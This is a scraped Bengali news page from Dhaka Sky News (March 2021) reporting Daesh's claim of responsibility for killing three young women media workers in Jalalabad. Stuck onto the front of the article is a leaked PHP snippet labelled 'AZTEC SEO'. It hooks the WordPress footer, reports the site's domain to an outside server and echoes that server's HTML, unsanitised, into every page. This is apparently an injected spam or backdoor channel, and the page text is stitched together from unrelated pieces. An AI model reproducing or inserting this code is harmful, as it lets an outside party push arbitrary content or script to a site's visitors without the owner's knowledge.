/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ৩ আফগান নারী গণমাধ্যম কর্মী হত্যার দায় স্বীকার করল দায়েশ | Dhaka Sky News

সৌদি বিমানবন্দরে ইয়েমেনিদের ড্রোন হামলা

আগের সংবাদ

খাশোগি হত্যার রিপোর্ট এখন আমেরিকার রাজনৈতিক হাতিয়ার: এর্দোগানের উপদেষ্টা

পরের সংবাদ

৩ আফগান নারী গণমাধ্যম কর্মী হত্যার দায় স্বীকার করল দায়েশ

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: March 3, 2021 , 9:47 pm

আফগানিস্তানের পূর্বাঞ্চলীয় জালালাবাদ শহরে গতকাল (মঙ্গলবার) নিহত তিন নারী গণমাধ্যম কর্মী হত্যার দায় স্বীকার করেছে উগ্র সন্ত্রাসী গোষ্ঠী দায়েশ।

গতকাল এনিকাস টেলিভিশন চ্যানেলের ওই তিন নারী কর্মী কাজ শেষে বাড়ি ফেরার পথে হামলার শিকার হন এবং অন্য একজন মারাত্মক আহত হন। আলাদা দুটি হামলায় এসব গণমাধ্যম কর্মী হতাহত হন।

এ সম্পর্কে দায়েশ আজ জানিয়েছে, তাদের সন্ত্রাসীরা নারী গণমাধ্যম কর্মীদের ওপর হামলা চালিয়েছে। হতাহতদের সবার বয়স ১৮ থেকে ২০ বছরের মধ্যে।

নিহত গণমাধ্যম কর্মীদের একজনের জানাযা

এনিকাস টেলিভিশন চ্যানেলের পরিচালক জালমে লতিফি বলেন, “মুরসাল ওয়াহিদি, সাদিয়া সাদাত ও শাহনাজ রোয়াফি নামের এই তিন গণমাধ্যম কর্মীকে হত্যার মধ্যদিয়ে আমাদেরকে সতর্ক সংকেত দেয়া হয়েছে। এর আগেও এই টেলিভিশন চ্যানেলের কর্মীদের ওপর হামলা হয়েছে।”

লতিফি জানান, এই তিন কর্মী বিনোদনমূলক অনুষ্ঠান স্থানীয় ভাষায় ডাবিং করার পর বাড়ি ফিরছিলেন। আফগানিস্তানে সংবাদ মাধ্যম বা টেলিভিশন ও রেডিওতে কাজ করা খুবই ঝুঁকির বিষয়। এ ধরনের হত্যাকাণ্ডের সঙ্গে জড়িতদের শাস্তির আওতায় না আনতে পারলে ঝুঁকি শুধু বাড়বেই। সূত্র : পার্সটুডে